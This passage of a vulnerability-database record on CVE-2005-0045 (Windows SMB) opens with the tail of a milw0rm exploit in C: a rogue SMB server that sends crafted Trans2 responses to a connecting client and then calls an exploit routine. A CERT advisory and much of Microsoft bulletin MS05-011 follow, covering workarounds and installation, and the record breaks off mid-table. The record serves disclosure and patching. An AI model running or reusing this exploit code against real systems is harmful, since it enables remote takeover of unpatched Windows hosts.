Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );\n\n\tsend ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"Trans2Response2\\n\" );\n\tTrans2Response2[30] = response[30];\n\tTrans2Response2[31] = response[31];\n\tTrans2Response2[34] = response[34];\n\tTrans2Response2[35] = response[35];\n\n\tstrncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );\n\tstrncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );\n\n\tsend ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );\n\n\tbzero ( &response, sizeof ( response ) );\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\tprintf ( \"Trans2Response3\\n\" );\n\tTrans2Response3[30] = response[30];\n\tTrans2Response3[31] = response[31];\n\tTrans2Response3[34] = response[34];\n\tTrans2Response3[35] = response[35];\n\n\tstrncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );\n\tstrncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );\n\n\tsend ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );\n}\n\nint\nmain ( int argc, char* argv[] )\n{\n\tint s1, s2, i;\n\tunsigned long fid = 0x1337;\n\tunsigned long treeid = 0x0808;\n\tunsigned long userid = 0x0808;\n\tunsigned long assocgroup = 0x4756;\n\tpid_t childpid;\n\tsocklen_t clilen;\n\tstruct sockaddr_in cliaddr, servaddr;\n\n\tbzero ( &servaddr, sizeof ( servaddr ) );\n\tservaddr.sin_family = AF_INET;\n\tservaddr.sin_addr.s_addr = htonl ( INADDR_ANY );\n\tservaddr.sin_port = htons ( PORT );\n\n\ts1 = socket ( AF_INET, SOCK_STREAM, 0 );\n\tbind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );\n\tlisten ( s1, 1 );\n\n\tclilen = sizeof ( cliaddr );\n\n\ts2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );\n\n\tclose ( s1 );\n\n\tprintf ( \"\\n%s\\n\\n\", inet_ntoa ( cliaddr.sin_addr ) );\n\n\tneg ( s2 ); // Negotiate\n\tsessionsetup ( s2, userid, treeid, 0 ); // SessionSetup\n\tfor ( i = 0; i < 15; i++ )\n\t{\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 0 );\n\t\tfid++;\n\t\tassocgroup ++;\n\t}\n\tdigg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnum\n\tfid++;\n\tassocgroup ++;\n\tdigg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolss\n\tfid++;\n\tassocgroup ++;\n\tfor ( i = 0; i < 4; i++ )\n\t{\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 0 );\n\t\tfid++;\n\t\tassocgroup ++;\n\t}\n\tdigg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReg\n\tuserid++;\n\ttreeid++;\n\tsessionsetup ( s2, userid, treeid, 1 ); // SessionSetup\n\tuserid--;\n\ttreeid--;\n\tfor ( i = 0; i < 2; i++ )\n\t{\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBios\n\t\tfid++;\n\t\tassocgroup ++;\n\t}\n\ttreeid += 2;\n\texploit ( s2, fid, assocgroup, userid, treeid );\n\n\tprintf ( \"done!\\n\" );\n\n\tclose ( s2 );\n}\n\n// milw0rm.com [2005-06-23]", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2021-09-28T17:52:40", "description": "### Overview\n\nA vulnerability in the way that Microsoft Windows handles some SMB packets could allow remote attackers to execute code of their choosing on a vulnerable system.\n\n### Description\n\nThe Microsoft Server Message Block (SMB), and its follow-on, [Common Internet File System](<http://www.microsoft.com/mind/1196/cifs.asp>) (CIFS), are network protocols that Windows uses to share files, printers, serial ports, and communicate between computers. A vulnerability exists in the way that the affected operating systems validate certain incoming SMB packets. Additional details about the underlying cause of the vulnerability are not known.\n\nAn unauthenticated remote attacker may be able to exploit this vulnerability by sending specially-crafted SMB packets to a vulnerable system. Microsoft reports that this vulnerability may also be exploited through a malicious web page. In this scenario, an attacker would need to trick or persuade a user into browsing the malicious web page or following a link to the malicious web page provided in an email message. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution\n\n**Apply a patch** \n \nMicrosoft has published [MS05-011](<http://www.microsoft.com/technet/security/bulletin/ms05-011.mspx>) in response to this issue. Users are strongly encouraged to review this bulletin and apply the patches it refers to. \n \n--- \n \n**Workarounds**\n\n \n**Filter network traffic** \nMicrosoft Security Bulletin [MS05-011](<http://www.microsoft.com/technet/security/bulletin/ms05-011.mspx>) also contains recommendations about packet filtering to mitigate this issue. Users, particularly those who are affected but unable to apply the patches, are encouraged to implement these workarounds. \n \n--- \n \n### Vendor Information\n\n652537\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: February 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft has published [MS05-011](<http://www.microsoft.com/technet/security/bulletin/ms05-011.mspx>)in response to this issue. Users are strongly encouraged to review this bulletin and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23652537 Feedback>).\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://www.microsoft.com/technet/security/bulletin/ms05-011.mspx>\n * <http://secunia.com/advisories/11634/>\n\n### Acknowledgements\n\nThanks to Microsoft Security for reporting this vulnerability. Microsoft, in turn, credits eEye Digital Security with reporting this vulnerability to them.\n\nThis document was written by Chad R Dougherty, based upon information provided by Microsoft.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0045](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-0045>) \n---|--- \n**Severity Metric:** | 27.09 \n**Date Public:** | 2005-02-08 \n**Date First Published:** | 2005-02-08 \n**Date Last Updated: ** | 2005-05-11 20:02 UTC \n**Document Revision: ** | 8 \n", "cvss3": {}, "published": "2005-02-08T00:00:00", "type": "cert", "title": "Microsoft Windows SMB packet validation vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-0045"], "modified": "2005-05-11T20:02:00", "id": "VU:652537", "href": "https://www.kb.cert.org/vuls/id/652537", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:11", "description": "Microsoft Security Bulletin MS05-011\r\nVulnerability in Server Message Block Could Allow Remote Code Execution (885250)\r\n\r\nIssued: February 8, 2005\r\nVersion: 1.0\r\n\r\nSummary\r\nWho should read this document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately.\r\n\r\nSecurity Update Replacement: None\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software: \r\n\r\n\u2022 Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Server 2003 \u2013 Download the update\r\n \r\n\u2022 Microsoft Windows Server 2003 for Itanium-based Systems \u2013 Download the update\r\n \r\n\r\nNon-Affected Software:\r\n\r\n\u2022 Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)\r\n \r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nTop of section\r\nGeneral Information\r\n Executive Summary \r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a newly-discovered, privately-reported vulnerability. The vulnerability is documented in the \u201cVulnerability Details\u201d section of this bulletin.\r\n\r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. \r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\n\r\nVulnerability Identifiers Impact of Vulnerability Windows 2000 Windows XP Windows Server 2003 \r\nServer Message Block Vulnerability - CAN-2005-0045\r\n Remote Code Execution\r\n Critical\r\n Critical\r\n Critical\r\n \r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nTop of section\r\n Frequently asked questions (FAQ) related to this security update \r\n\r\nI am still using Windows XP, but extended security update support ended on September 30th, 2004. What should I do?\r\n\r\nThe original version of Windows XP, generally known as Windows XP Gold or Windows XP Release to Manufacturing (RTM) version, reached the end of its extended security update support life cycle on September 30, 2004.\r\n\r\nIt should be a priority for customers who have this operating system version to migrate to supported operating system versions to prevent potential exposure to vulnerabilities. For more information about the Windows Service Pack Product Lifecycle, visit the Microsoft Support Lifecycle Web site. For more information about the Windows Product Lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. I\u2019m still using one of these operating systems, what should I do?\r\n\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, and Windows 2000 Service Pack 2 have reached the end of their life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site. \r\n\r\nCustomers who require additional support for Windows NT 4.0 SP6a must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. \r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\nYes. MBSA will determine whether this update is required. For more information about MBSA, visit the MBSA Web site.\r\n\r\nNote After April 20, 2004, the Mssecure.xml file that is used by MBSA 1.1.1 and earlier versions is no longer being updated with new security bulletin data. Therefore, scans that are performed after that date by using MBSA 1.1.1 or earlier will be incomplete. All users should upgrade to MBSA 1.2 because it provides more accurate security update detection and supports additional products. Users can download MBSA 1.2.1 from the MBSA Web site. For more information about MBSA support, visit the following Microsoft Baseline Security Analyzer (MBSA) 1.2.1 Q&A Web site.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nYes. SMS can help detect and deploy this security update. For information about SMS, visit the SMS Web site. The Security Update Inventory Tool is required for detecting Microsoft Windows and other affected Microsoft products. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460\r\n\r\nTop of section\r\n Vulnerability Details \r\n\r\n Server Message Block Vulnerability - CAN-2005-0045: \r\n\r\nA remote code execution vulnerability exists in Server Message Block (SMB) that could allow an attacker who successfully exploited this vulnerable to take complete control of the affected system.\r\n\r\n Mitigating Factors for Server Message Block Vulnerability - CAN-2005-0045: \r\n\r\n\u2022 Network-based attacks using broadcast packets would typically be limited to the local subnet because most routers do not forward broadcast packets.\r\n \r\n\u2022 Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. By default, the Windows Firewall that is provided as part of Windows XP Service Pack 2 blocks the affected ports from responding to network based attempts to exploit this vulnerability. However, Windows XP Service Pack 2 would still vulnerable to the Web-based attack scenarios.\r\n \r\n\u2022 In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to exploit this vulnerability. An attacker could also attempt to compromise a Web site to have it display a Web page with malicious content. An attacker would have no way to force users to visit a Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site or to a site that has been compromised by the attacker.\r\n \r\n\u2022 The vulnerability could not be exploited automatically through e-mail. For an attack to be successful a user must click a link that is sent in an e-mail message.\r\n \r\n\r\nTop of section\r\n Workarounds for Server Message Block Vulnerability - CAN-2005-0045: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section. \r\n\r\nNote Other protocols such as IPX/SPX could be vulnerable to this issue. If those protocols are in use, it would be important to block the appropriate ports for those protocols as well. For more information about IPX/SPX, see the following Microsoft Web site.\r\n\r\n\u2022 Block TCP ports 139 and 445 at the firewall:\r\n\r\nThese ports are used to initiate a connection with the affected protocol. Blocking them at the firewall, both inbound and outbound, will help prevent systems that are behind that firewall from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about the ports, visit the following Web site.\r\n \r\n\u2022 To help protect from network-based attempts to exploit this vulnerability, use a personal firewall, such as the Internet Connection Firewall, which is included with Windows XP and with Windows Server 2003.\r\n\r\nBy default, the Internet Connection Firewall feature in Windows XP and in Windows Server 2003 helps protect your Internet connection by blocking unsolicited incoming traffic. We recommend that you block all unsolicited incoming communication from the Internet.\r\n\r\nTo enable the Internet Connection Firewall feature by using the Network Setup Wizard, follow these steps:\r\n\r\n1.\r\n Click Start, and then click Control Panel.\r\n \r\n2.\r\n In the default Category View, click Network and Internet Connections, and then click Setup or change your home or small office network. The Internet Connection Firewall feature is enabled when you select a configuration in the Network Setup Wizard that indicates that your system is connected directly to the Internet.\r\n \r\n\r\nTo configure Internet Connection Firewall manually for a connection, follow these steps:\r\n\r\n1.\r\n Click Start, and then click Control Panel.\r\n \r\n2.\r\n In the default Category View, click Networking and Internet Connections, and then click Network Connections.\r\n \r\n3.\r\n Right-click the connection on which you want to enable Internet Connection Firewall, and then click Properties.\r\n \r\n4.\r\n Click the Advanced tab.\r\n \r\n5.\r\n Click to select the Protect my computer or network by limiting or preventing access to this computer from the Internet check box, and then click OK.\r\n \r\n\r\nNote If you want to enable certain programs and services to communicate through the firewall, click Settings on the Advanced tab, and then select the programs, the protocols, and the services that are required.\r\n \r\n\u2022 To help protect from network-based attempts to exploit this vulnerability, use a personal firewall, enable advanced TCP/IP filtering on systems that support this feature.\r\n\r\nYou can enable advanced TCP/IP filtering to block all unsolicited inbound traffic. For more information about how to configure TCP/IP filtering, see Microsoft Knowledge Base Article 309798.\r\n \r\n\u2022 To help protect from network-based attempts to exploit this vulnerability, use a personal firewall, block the affected ports by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security (IPSec) to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\n \r\n\r\nTop of section\r\n FAQ for Server Message Block Vulnerability - CAN-2005-0045: \r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. \r\n\r\nWhat causes the vulnerability?\r\nThe vulnerability results because of the process that the affected operating systems use to validate certain incoming SMB packets.\r\n\r\nWhat is SMB?\r\nServer Message Block (SMB), and its follow-on, Common Internet File System (CIFS), is the Internet Standard protocol that Windows uses to share files, printers, serial ports, and also to communicate between computers. To do this, SMB uses named pipes and mail slots. In a networked environment, servers make file systems and resources available to clients. Clients make SMB requests for resources. Servers make SMB responses. This is described as a client server, request-response protocol. \r\n\r\nDoes this vulnerability also affect CIFS?\r\nCommon Internet File System (CIFS) is an Internet Standard protocol. The vulnerability described here resides specifically in Microsoft's implementation of the protocol and not the protocol itself. \r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nThere are several different ways that an attacker could try to exploit this vulnerability. An attacker could try to exploit the vulnerability directly over a network by creating a series of specially crafted messages and sending them to an affected system. These messages could require an attacker to use broadcast packets. The messages could then cause the affected system to execute code. The network based attacks that require the use of broadcast packets would typically be limited to local subnets since routers do not typically forward broadcast packets.\r\n\r\nAlso, an attacker could attempt to exploit this vulnerability by persuading the user to view or to preview an e-mail message that contains a URL and then persuade the user to then click the URL.\r\n\r\nAn attacker could also access the affected component through another vector. For example, an attacker could use another program that passes parameters to the vulnerable component either locally or remotely.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. By default, the Windows Firewall that is provided as part of Windows XP Service Pack 2 blocks the affected ports from responding to network based attempts to exploit this vulnerability. However, Windows XP Service Pack 2 would still vulnerable to the Web-based attack scenarios.\r\n\r\nCould the vulnerability be exploited over the Internet? \r\nYes. An attacker could try to exploit this vulnerability over the Internet. Firewall best practices and standard default firewall configurations can help protect against attacks that originate from the Internet. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. IT professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate SMB network packets before it passes the data to the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued. \r\n\r\nTop of section\r\nTop of section\r\nTop of section\r\n Security Update Information \r\n\r\nAffected Software:\r\n\r\nFor information about the specific security update for your affected software, click the appropriate link:\r\n\r\n Windows Server 2003 (all versions) \r\n\r\nPrerequisites\r\nThis security update requires a release version of Windows Server 2003.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in Windows Server 2003 Service Pack 1.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command-line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation has completed\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting the Setup program\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows Server 2003:\r\n\r\nWindowsserver2003-kb885250-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows Server 2003:\r\n\r\nWindowsserver2003-kb885250-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB885250$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; and Windows Small Business Server 2003:\r\n\r\nFile Name Version Date Time Size Folder \r\nMrxsmb.sys\r\n 5.2.3790.252\r\n 19-Jan-2005\r\n 01:35\r\n 394,240\r\n RTMGDR\r\n \r\nMrxsmb.sys\r\n 5.2.3790.252\r\n 19-Jan-2005\r\n 02:00\r\n 395,776\r\n RTMQFE\r\n \r\nRdbss.sys\r\n 5.2.3790.221\r\n 12-Oct-2004\r\n 00:29\r\n 158,208\r\n RTMQFE\r\n \r\n\r\nWindows Server 2003, Enterprise Edition for Itanium-based Systems and Windows Server 2003, Datacenter Edition for Itanium-based Systems:\r\n\r\nFile Name Version Date Time Size CPU Folder \r\nMrxsmb.sys\r\n 5.2.3790.252\r\n 19-Jan-2005\r\n 00:57\r\n 1,122,816\r\n IA-64\r\n RTMGDR\r\n \r\nMrxsmb.sys\r\n 5.2.3790.252\r\n 19-Jan-2005\r\n 01:34\r\n 1,125,376\r\n IA-64\r\n RTMQFE\r\n \r\nRdbss.sys\r\n 5.2.3790.221\r\n 12-Oct-2004\r\n 00:30\r\n 464,896\r\n IA-64\r\n RTMQFE\r\n \r\n\r\nNote When you install this security update on Windows Server 2003, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix. If you have previously installed a hotfix to update an affected file, the installer copies the RTMQFE files to your system. Otherwise, the installer copies the RTMGDR files to your system. \r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying that the Update Has Been Applied\r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties. \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; Windows Small Business Server 2003; Windows Server 2003, Enterprise Edition for Itanium-based Systems; and Windows Server 2003, Datacenter Edition for Itanium-based Systems:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP1\KB885250\Filelist\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly if an administrator or an OEM integrates or slipstreams the 885250 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Windows XP (all versions) \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows XP Service Pack 1 or a later version. For more information, see Microsoft Knowledge Base Article 322389.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command-line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation has completed\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting the Setup program\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Microsoft Windows XP:\r\n\r\nWindowsxp-kb885250-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP:\r\n\r\nWindowsxp-kb885250-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB885250$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\n\r\nFile Name Version Date Time Size Folder \r\nCscdll.dll\r\n 5.1.2600.1599\r\n 28-Oct-2004\r\n 01:29\r\n 92,160\r\n SP1QFE\r\n \r\nMrxsmb.sys\r\n 5.1.2600.1620\r\n 19-Jan-2005\r\n 03:51\r\n 440,064\r\n SP1QFE\r\n \r\nRdbss.sys\r\n 5.1.2600.1599\r\n 12-Oct-2004\r\n 16:22\r\n 170,112\r\n SP1QFE\r\n \r\nMrxsmb.sys\r\n 5.1.2600.2598\r\n 19-Jan-2005\r\n 04:26\r\n 451,584\r\n SP2GDR\r\n \r\nMrxsmb.sys\r\n 5.1.2600.2598\r\n 19-Jan-2005\r\n 03:51\r\n 451,584\r\n SP2QFE\r\n \r\n\r\nWindows XP 64-Bit Edition Service Pack 1 (Itanium):\r\n\r\nFile Name Version Date Time Size CPU Folder \r\nCscdll.dll\r\n 5.1.2600.1599\r\n 28-Oct-2004\r\n 01:29\r\n 237,056\r\n IA-64\r\n SP1QFE\r\n \r\nMrxsmb.sys\r\n 5.1.2600.1620\r\n 18-Jan-2005\r\n 19:39\r\n 1,292,544\r\n IA-64\r\n SP1QFE\r\n \r\nRdbss.sys\r\n 5.1.2600.1599\r\n 